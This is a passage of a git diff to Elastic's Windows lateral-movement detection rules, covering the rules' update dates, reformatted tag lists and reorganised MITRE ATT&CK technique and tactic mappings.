"https://attack.mitre.org/techniques/T1550/003/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" -[[rule.threat.technique.subtechnique]] -id = "T1558.003" -name = "Kerberoasting" -reference = "https://attack.mitre.org/techniques/T1558/003/" - - [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 4f7be9dafd2..4df87d44b05 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,36 +85,18 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index edec6ac25c0..e90ad419cc3 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -84,36 +84,36 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index 99d6bbb8067..b3becd3a64d 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -60,15 +60,7 @@ references = ["https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round- risk_score = 47 rule_id = "8f919d4b-a5af-47ca-a594-6be59cd924a4" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -85,19 +77,36 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml index 6ddfe3c7e4b..b5ac7330e7f 100644 --- a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml +++ b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/22" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -91,31 +91,26 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml index c2c614f4ad2..ba70c4d0f18 100644 --- a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml +++ b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,24 +87,13 @@ sequence by host.id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - [[rule.threat.technique]] id = "T1570" name = "Lateral Tool Transfer" reference = "https://attack.mitre.org/techniques/T1570/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index 9f04832e1d8..e45c278391a 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -145,19 +145,23 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index 8dbb6d82a42..9a228e246ec 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml +++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,15 +57,7 @@ Windows Management Instrumentation (WMI) is a core Windows feature enabling remo risk_score = 47 rule_id = "f3475224-b179-4f78-8877-c2bd64c26b88" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -99,26 +91,31 @@ sequence by host.id with maxspan = 20s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml index 3352383ebb2..65c6a7dbcea 100644 --- a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml +++ b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,21 +62,7 @@ WebDav and hidden remote shares facilitate file sharing and collaboration across risk_score = 47 rule_id = "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,58 +80,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1087" -name = "Account Discovery" -reference = "https://attack.mitre.org/techniques/T1087/" -[[rule.threat.technique.subtechnique]] -id = "T1087.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1087/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" - - - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules/windows/lateral_movement_powershell_remoting_target.toml b/rules/windows/lateral_movement_powershell_remoting_target.toml index 39f0f961dc7..c3800a224ff 100644 --- a/rules/windows/lateral_movement_powershell_remoting_target.toml +++ b/rules/windows/lateral_movement_powershell_remoting_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/24" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,17 +68,7 @@ references = [ risk_score = 47 rule_id = "2772264c-6fb9-4d9d-9014-b416eed21254" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -92,36 +82,18 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.006" name = "Windows Remote Management" reference = "https://attack.mitre.org/techniques/T1021/006/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/lateral_movement_rdp_enabled_registry.toml index 76936f15511..f3703e06da7 100644 --- a/rules/windows/lateral_movement_rdp_enabled_registry.toml +++ b/rules/windows/lateral_movement_rdp_enabled_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/25" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,31 +102,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index 197d4339c52..72f7f70f5c2 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -90,19 +90,13 @@ process where host.os.type == "windows" and event.type == "start" and user.id != [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" -[[rule.threat.technique.subtechnique]] -id = "T1021.002" -name = "SMB/Windows Admin Shares" -reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml index 374035f3dfd..c460493bac4 100644 --- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml +++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/30" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,31 +101,36 @@ sequence by winlog.logon.id, winlog.computer_name with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/lateral_movement_remote_services.toml index 6409bf739d8..b7e54f55c06 100644 --- a/rules/windows/lateral_movement_remote_services.toml +++ b/rules/windows/lateral_movement_remote_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -107,15 +107,7 @@ references = [ risk_score = 47 rule_id = "aa9a274d-6b53-424d-ac5e-cb8ca4251650" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] type = "eql" query = ''' @@ -161,14 +153,31 @@ sequence with maxspan=1s [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" + +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/lateral_movement_remote_task_creation_winlog.toml index 43c46a6440b..fd0ce3a7261 100644 --- a/rules/windows/lateral_movement_remote_task_creation_winlog.toml +++ b/rules/windows/lateral_movement_remote_task_creation_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ note = """## Triage and analysis risk_score = 47 rule_id = "9c865691-5599-447a-bac9-b3f2df5f9a9d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Data Source: Windows Security Event Logs", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -63,31 +56,49 @@ iam where host.os.type == "windows" and event.action == "scheduled-task-created" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" + +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/lateral_movement_scheduled_task_target.toml index 53d7fe1e840..9f0d96a262a 100644 --- a/rules/windows/lateral_movement_scheduled_task_target.toml +++ b/rules/windows/lateral_movement_scheduled_task_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/20" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,16 +50,7 @@ references = ["https://www.elastic.co/security-labs/hunting-for-lateral-movement risk_score = 47 rule_id = "954ee7c8-5437-49ae-b2d6-2960883898e9" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne"] type = "eql" query = ''' @@ -77,31 +68,31 @@ sequence by host.id, process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/lateral_movement_unusual_dns_service_children.toml index f9f1e18e1ff..ff217f183a0 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_children.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_children.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,21 +77,7 @@ references = [ risk_score = 73 rule_id = "8c37dc0e-e3ac-4c97-8aa0-cf6a9122de45" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Lateral Movement", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -111,14 +97,26 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml index d7b316d6ed2..a07a9bf1cf7 100644 --- a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml +++ b/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/16" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/10/06" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,17 +54,7 @@ references = [ risk_score = 47 rule_id = "c7ce36c0-32ff-4f9a-bfc2-dcb242bf99f9" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Lateral 